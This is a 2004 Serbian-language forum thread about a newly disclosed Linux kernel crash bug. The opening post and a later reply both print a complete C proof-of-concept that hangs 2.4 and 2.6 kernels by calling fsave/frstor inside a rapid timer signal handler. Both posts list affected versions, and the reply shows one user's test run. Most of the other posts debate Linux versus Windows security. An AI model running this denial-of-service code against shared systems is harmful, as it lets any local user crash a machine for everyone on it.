• Naslovna
• FAQ
• Pravilnik
• O ES-u
• Tim
• Korisnici
• Statistike

 

• elitesecurity ::
• elitemadzone ::
• EMAIL ::
• RSS ::
• ES Mobile

  Niste ulogovani?  Username :   Password:   

• Registracija
• Zaboravili ste password?
• Flashback ▲▼
• Login problem?

 

Pretraga:

 

Srodne teme 14.04.2024. Re: Gde je Kejt? (samo pogrešni odgovori) 03.03.2002. Winbond ISDN TA 25.01.2002. RH-updated 2.4 kernel available 22.03.2002. Kernel(tamo-vamo) 24.07.2002. Kernel Module + Socket 07.06.2003. kernel header 05.05.2003. jos jednom grub 20.09.2003. Potpuno nov - (Knoppix-Linux) par pitanja 30.09.2003. Kernel panic 22.01.2005. Linux Kernel Back-Door Hack Attempt Discovered Navigacija Brisanje liste Aktuelne teme u ovom forumu: Minhen & Linux, sprdnja ili šta j.. Linux prebacio 4% Gde vidite nVidia-u za par godina Počelo čipovanje :) Konfiguracija wifi landing stranice za.. Ne volim kad se dimenzije proizvoda pr.. Gde vidite Intel-a za nekih 2 do 5 god.. Cloud, buducnost, prevara ili zabluda? Drugi procesor unutar intel x86 BootHole - virtually every Linux distr.. Takmičenje u hakovanju PC as a poorly debugged set of device .. Razvoj po opensource modelu slobodnih .. Apple će skenirati fotografije na iPh.. John McAfee - RIP Izaberite forum: Linux Linux aplikacije Linux desktop okruženja Linux hardware Windows desktop Windows aplikacije Zaštita Office Windows drajveri Office :: Word Office :: Excel Macintosh Mac hardware Mac software Iphone Enterprise Networking SOHO Networking Wireless Windows mreže Linux mreže Wireless :: WiMax Wireless :: Mikrotik Wireless :: Wireless oprema Linux/UNIX serveri i servisi Unix BSD Skript jezici Security Virtualizacija Cloud Computing Services Security :: Kriptografija i enkripcija .NET 3D programiranje Art of Programming Asembler C/C++ programiranje Kernel i OS programiranje Pascal / Delphi / Kylix Java Embedded sistemi Perl PHP Python Visual Basic 6 Veštačka inteligencija Security Coding XML GameDev - Razvoj Igara Ostali programski jezici PHP :: PHP za početnike PHP :: Smarty template engine .NET :: .NET Desktop razvoj .NET :: ASP.NET .NET :: WPF Programiranje C/C++ programiranje :: C/C++ za početnike Baze podataka MySQL Oracle Access MS SQL Firebird/Interbase PostgreSQL Fiksna telefonija VoIP Udruženje korisnika teleko.. GSM - telefoni GSM - upotreba GSM - servisiranje Mreže i novosti Smartphone Mreže i novosti :: Mobilni internet Mreže i novosti :: Telenor - korisnički servis Mreže i novosti :: VIP - korisnički servis Mreže i novosti :: MTS - korisnički servis Smartphone :: Symbian OS Smartphone :: Windows Mobile Smartphone :: Android GSM - telefoni :: Nokia PDA Uređaji GPS Portable Players Anonimnost i privatnost ISP Browseri E-mail Instant Messaging FTP Google Hosting ISP :: Wireless mreže i ISP ISP :: ADSL E-mail :: Anti-spam Instant Messaging :: IRC Hosting :: Domeni Google :: Gmail E-Marketing Web aplikacije Web dizajn i CSS Web dizajn softver Web razvoj Pretraživači i SEO Flash Javascript i AJAX Web dizajn i CSS :: Kritike Grafički dizajn Izdavaštvo 3D modelovanje Rasterska grafika Vektorska grafika 3D modelovanje :: CAD/CAM Matične ploče, procesori .. Video karte i monitori Storage Ostali hardver Overclocking & Modding PC Konfiguracije Laptopovi Vodič za kupovinu - PC har.. Tablet PC Muzička produkcija Audio kompresija Audio softver Video produkcija Video kompresija Video softver Multimedijalni uređaji Digitalni fotoaparati Digitalne kamere Home Theater Digitalni fotoaparati :: Fotografija Digitalni fotoaparati :: Vodič za kupovinu - Digita.. Elektronika Elektrotehnika Elektronika :: TV uređaji Elektronika :: Radio elektronika i tehnika Elektronika :: Mikrokontroleri Elektronika :: Audio-elektronika Auto-elektronika :: Tuning Vodič za učenje Vodič za posao Vodič za emigraciju Fizika Matematika Nauka Sertifikati Informatika Vodič za učenje :: Seminarski radovi Vodič za učenje :: Obrazovne institucije Vodič za emigraciju :: Život u USA Vodič za emigraciju :: Život u Norveškoj Vodič za emigraciju :: Život u Nemačkoj E-Poslovanje E-Kupovina IT pravo i politika razvoja IT događaji IT berza poslova IS i ERP Ekonomija Berza Cryptocoins IT berza poslova :: Arhiva IT berze poslova IT pravo i politika razvoja :: Registar Nacionalnog ID E-Poslovanje :: E-Transakcije E-Poslovanje :: Forex E-Kupovina :: Platne kartice Digitalna Televizija Advocacy Ankete Predlozi i pitanja Vesti Čekaonica Vesti :: ES leto manifestacija MadZone TechZone Poljoprivreda AutoZone MotoZone Svakodnevnica Video igre MadZone :: Zanimljivi linkovi MadZone :: Kultura TechZone :: Ergonomija TechZone :: Grejanje TechZone :: Klimatizacija TechZone :: Bela tehnika AutoZone :: Fiat Panda club Lista poslednjih: 16, 32, 64, 128 poruka.

Ivan Dimkovic Administrator Član broj: 13 Poruke: 16687 *.dip.t-dialin.net +7173 Profil New Kernel Crash-Exploit discovered (Linux) 14.06.2004. u 21:47 - pre 241 meseci Da odvojimo ovo od Win majstora teme koja je postala megaflame... http://reviewed.homelinux.org/...-11_kernel_crash/index.html.en Dakle - ovo radi i u user i root modu, dakle i remote shell acc je dovoljan da skrka pingvina: Code:  #include <sys/time.h>   #include <signal.h>   #include <unistd.h>      static void Handler(int ignore)   {    char fpubuf[108];    __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));    write(2, "*", 1);    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));   }      int main(int argc, char *argv[])   {    struct itimerval spec;    signal(SIGALRM, Handler);    spec.it_interval.tv_sec=0;    spec.it_interval.tv_usec=100;    spec.it_value.tv_sec=0;    spec.it_value.tv_usec=100;    setitimer(ITIMER_REAL, &spec, NULL);    while(1)     write(1, ".", 1);       return 0;   } Impresivno :) Citat: * Linux 2.6.x o 2.6.7-rc2 o 2.6.6 (vanilla) o 2.6.6-rc1 SMP (varified by blaise) o 2.6.6 SMP (verified by riven) o 2.6.5-gentoo (verified by RatiX) o 2.6.5-mm6 - (verified by Mariux) o 2.6.5 (fedora core 2 vanilla) o 2.6.3-13mdk (Mandrake) * Linux 2.4.2x o 2.4.26 vanilla o 2.4.26, grsecurity 2.0 config o 2.4.26-rc1 vanilla o 2.4.26-gentoo-r1 o 2.4.22 o 2.4.22-1.2188 Fedora FC1 Kernel o 2.4.20 RH7.3 (gcc 2.96) o 2.4.18-bf2.4 (debian woody vanilla) Even grsecurity-patched kernels crash. "I would have hoped that grsec would have blocked or logged something, but nothing appeared in the logs." Vincent DigiCortex (ex. SpikeFun) - Cortical Neural Network Simulator: http://www.digicortex.net/node/1 Videos: http://www.digicortex.net/node/17 Gallery: http://www.digicortex.net/node/25 PowerMonkey - Redyce CPU Power Waste and gain performance! - https://github.com/psyq321/PowerMonkey Odgovor na temu

caboom Igor Bogicevic bgd Član broj: 255 Poruke: 1503 *.vdial.verat.net ICQ: 60630914 +1 Profil Re: New Kernel Crash-Exploit discovered (Linux) 14.06.2004. u 21:49 - pre 241 meseci bogami... zakucava ki zeca. OV SM LA PK Odgovor na temu

caiser Član broj: 4677 Poruke: 2462 *.vdial.verat.net ICQ: 162962030 Profil Re: New Kernel Crash-Exploit discovered (Linux) 14.06.2004. u 21:51 - pre 241 meseci A tacno je i ovo za logove mamu mu... Aj prevedi! Odgovor na temu

Dragi Tata Malo ispod Kanade Član broj: 1958 Poruke: 3906 66.228.70.* +6 Profil Re: New Kernel Crash-Exploit discovered (Linux) 14.06.2004. u 22:03 - pre 241 meseci Sreća te praktično niko ne koristi Linux, tako da ovaj sigurnosni propust neće izazvati nikakvu pometnju. O "Blasteru" i sličnim pojavama su brujale novinske agencije danima - ovo niko neće ni da primeti. IOCC Odgovor na temu

caboom Igor Bogicevic bgd Član broj: 255 Poruke: 1503 *.vdial.verat.net ICQ: 60630914 +1 Profil Re: New Kernel Crash-Exploit discovered (Linux) 14.06.2004. u 22:04 - pre 241 meseci sta i da uloguje kada ga zapuni ki zeku, srecom u pitanju je lokalni eksploNJt, ali je po npr. web servere veoma nezgodno sto i obican korisnik moze ovako lepo da napuni kernel. OV SM LA PK Odgovor na temu

Reljam Relja Markovic San Francisco Član broj: 531 Poruke: 1793 *.microsoft.com +18 Profil Re: New Kernel Crash-Exploit discovered (Linux) 14.06.2004. u 22:12 - pre 241 meseci Citat: Dragi Tata:Sreća te praktično niko ne koristi Linux, tako da ovaj sigurnosni propust neće izazvati nikakvu pometnju. O "Blasteru" i sličnim pojavama su brujale novinske agencije danima - ovo niko neće ni da primeti. Da, ovo je dobar primer 'security through obscurity' bezbednosnog modela na Linuxu: jeste da postoji rupa, ali ima suvise malo korisnika tako da ne moze da se dodje do kriticne mase za neki Blaster. Odgovor na temu

caiser Član broj: 4677 Poruke: 2462 *.vdial.verat.net ICQ: 162962030 Profil Re: New Kernel Crash-Exploit discovered (Linux) 14.06.2004. u 22:44 - pre 241 meseci Citat: caboom:sta i da uloguje kada ga zapuni ki zeku, srecom u pitanju je lokalni eksploNJt, ali je po npr. web servere veoma nezgodno sto i obican korisnik moze ovako lepo da napuni kernel. Pa bas zato. :) Mogao bi da se napenali bezobrazni korisnik. :) Aj prevedi! Odgovor na temu

caboom Igor Bogicevic bgd Član broj: 255 Poruke: 1503 *.vdial.verat.net ICQ: 60630914 +1 Profil Re: New Kernel Crash-Exploit discovered (Linux) 14.06.2004. u 23:07 - pre 241 meseci pa to jes', ali s' obzirom na specificnost ovog koda latencija do potpunog blokiranja je veoma mala. OV SM LA PK Odgovor na temu

Ivan Dimkovic Administrator Član broj: 13 Poruke: 16687 *.dip.t-dialin.net +7173 Profil Re: New Kernel Crash-Exploit discovered (Linux) 14.06.2004. u 23:19 - pre 241 meseci Kako bre sad ovo - zar nisu rekli da je Linux bezbedan i da ne moze da se srusi? A kamo ono o user/root razdvajanju i obezbedjivanju sistema :) DigiCortex (ex. SpikeFun) - Cortical Neural Network Simulator: http://www.digicortex.net/node/1 Videos: http://www.digicortex.net/node/17 Gallery: http://www.digicortex.net/node/25 PowerMonkey - Redyce CPU Power Waste and gain performance! - https://github.com/psyq321/PowerMonkey Odgovor na temu

jc denton Član broj: 2358 Poruke: 1705 *.air.tehnicom.net Profil Re: New Kernel Crash-Exploit discovered (Linux) 14.06.2004. u 23:33 - pre 241 meseci Ma zavera protiv Linuxa bre. fire, walk with me Odgovor na temu

VRider Marković Damir (BGD/SD Karaburma)/Pirot Član broj: 1510 Poruke: 4132 195.178.35.* Jabber: damirm | gmail | com ICQ: 134002435 +13 Profil Re: New Kernel Crash-Exploit discovered (Linux) 15.06.2004. u 03:09 - pre 241 meseci E, sabani... Mozete da me povucete za ... bug... Code: [damir@phoenix temp]$ cat test.c #include <sys/time.h> #include <signal.h> #include <unistd.h> static void Handler(int ignore) { char fpubuf[108]; __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf)); write(2, "*", 1); __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf)); } int main(int argc, char *argv[]) { struct itimerval spec; signal(SIGALRM, Handler); spec.it_interval.tv_sec=0; spec.it_interval.tv_usec=100; spec.it_value.tv_sec=0; spec.it_value.tv_usec=100; setitimer(ITIMER_REAL, &spec, NULL); while(1) write(1, ".", 1); return 0; } [damir@phoenix temp]$ gcc -o test test.c [damir@phoenix temp]$ ./test ................................................................. .................................................................. .................................................................. .................................................................. .................................................................. .................................................................. .................................................................. .................................................................. .................................................................. .................................................................. .................................................*............... .................................................................. .................................................................. .................................................................. .................................................................. .................................................................. ..*Floating point exception [damir@phoenix temp]$ Jos samo da mi objasnite kako bi to iskoristili cak i da radi kod mene? Da nemate mozda shell nalog? JaFreelancer.com Odgovor na temu

caiser Član broj: 4677 Poruke: 2462 *.verat.net ICQ: 162962030 Profil Re: New Kernel Crash-Exploit discovered (Linux) 15.06.2004. u 06:50 - pre 241 meseci Sto ce reci, VRider je vec patchovao kernel. :)))) Aj prevedi! Odgovor na temu

popeye Branko Ivanović Beograd Član broj: 3846 Poruke: 960 *.bitsyu.net Jabber: popeye@elitesecurity.org ICQ: 18038966 Sajt: popeye.linuxo.org Profil Re: New Kernel Crash-Exploit discovered (Linux) 15.06.2004. u 08:48 - pre 241 meseci Gentoo distribucija je imala više verzija jezgra 2.4.25 i 2.4.26 koje nisu ni bile ranjive... Odgovor na temu

caiser Član broj: 4677 Poruke: 2462 *.verat.net ICQ: 162962030 Profil Re: New Kernel Crash-Exploit discovered (Linux) 15.06.2004. u 09:25 - pre 241 meseci Citat: Dragi Tata:Sreća te praktično niko ne koristi Linux, tako da ovaj sigurnosni propust neće izazvati nikakvu pometnju. O "Blasteru" i sličnim pojavama su brujale novinske agencije danima - ovo niko neće ni da primeti. Hehehehe, tek sam sad primetio ovaj komentar. :) Ovde postoji ogromna razlika izmedju ovog bug-a i Blastera (i vecine crva za windows). Dok se Blaster (i vecina crva za windows :) siri sama, za exploatisanje ovog bug-a moras imati direktan pristup kompu i ne moze se izvrsiti njegova automatizacija. :) Aj prevedi! Odgovor na temu

popeye Branko Ivanović Beograd Član broj: 3846 Poruke: 960 *.bitsyu.net Jabber: popeye@elitesecurity.org ICQ: 18038966 Sajt: popeye.linuxo.org Profil Re: New Kernel Crash-Exploit discovered (Linux) 15.06.2004. u 10:36 - pre 241 meseci I ne radi se o podizanju privilegija, već o obaranju sistema. Odgovor na temu

caiser Član broj: 4677 Poruke: 2462 *.verat.net ICQ: 162962030 Profil Re: New Kernel Crash-Exploit discovered (Linux) 15.06.2004. u 11:44 - pre 241 meseci Sto znaci da je bug totalno bezazlen. :o) Aj prevedi! Odgovor na temu

popeye Branko Ivanović Beograd Član broj: 3846 Poruke: 960 *.pristop.co.yu Jabber: popeye@elitesecurity.org ICQ: 18038966 Sajt: popeye.linuxo.org Profil Re: Legalizacija softvera 15.06.2004. u 12:34 - pre 241 meseci Još malo, pa bi bio feature. :P Šalu na stranu, ozbiljan propust je u pitanju, ali ako ne postoji način da se preuzmu administratorske privilegije - nije pogodan za virus poput Blastera. Jedino možda za bosanski virus. :) Odgovor na temu

Gojko Vujovic Amsterdam, NL Administrator Član broj: 1 Poruke: 13651 +165 Profil Re: New Kernel Crash-Exploit discovered (Linux) 15.06.2004. u 12:53 - pre 241 meseci Ne može da se poredi ovakav propust i Blaster worm. Ja ne volim kad se linux "gurui" kunu u neprobojnost njihovog miljenika, ali mi još više smeta cinizam windowsaša. :) Kao prvo bilo je još 50 verzija wormova koji su harali windowsom i pre i posle tog blastera. I svaki je prouzrokovao enormnu štetu (novčanu), ako ništa onda zbog downtimea računara koji su bili inficirani. A blaster je pogađao gotovo svaku windows mašinu povezanu na net. Da bi se ovo aktiviralo na linuxu potrebno je imati i shell pristup. To se retko daje neproverenim osobama, kao što ni vi gospodo ne dajete remote desktop access ljudima kojima ne možete da verujete ili kojima ne možete da uđete u trag ukoliko naprave neku glupost. Oni malobrojni shell account serveri će biti patchovani i kraj priče. Eto zašto će ovo proći sa mnogo manje pažnje u javnosti. Odgovor na temu

VRider Marković Damir (BGD/SD Karaburma)/Pirot Član broj: 1510 Poruke: 4132 195.178.35.* Jabber: damirm | gmail | com ICQ: 134002435 +13 Profil Re: New Kernel Crash-Exploit discovered (Linux) 15.06.2004. u 13:30 - pre 241 meseci Citat: caiser:Sto ce reci, VRider je vec patchovao kernel. ))) Pa jel' VRider guru, ili nije? JaFreelancer.com Odgovor na temu

degojs Član broj: 4716 Poruke: 5096 +51 Profil Re: New Kernel Crash-Exploit discovered (Linux) 15.06.2004. u 13:41 - pre 241 meseci Međutim na Windowsu imaš pojavu da ako samo 0.1% mašina nije zakrpljeno, to je ogroman broj - sasvim dovoljan da izazove veće probleme. Koliko je 0.1% Linux mašina? Nije baš mnogo, zar ne? Ako Win koristi 600M korisnika, 0.1% je 600,000. Mnogo je Gojko.. a daleko od toga da je na Windowsu samo 0.1% onih koji ne vode mnogo računa o ovim stvarima. Kamo sreće. Commercial-Free !!! Odgovor na temu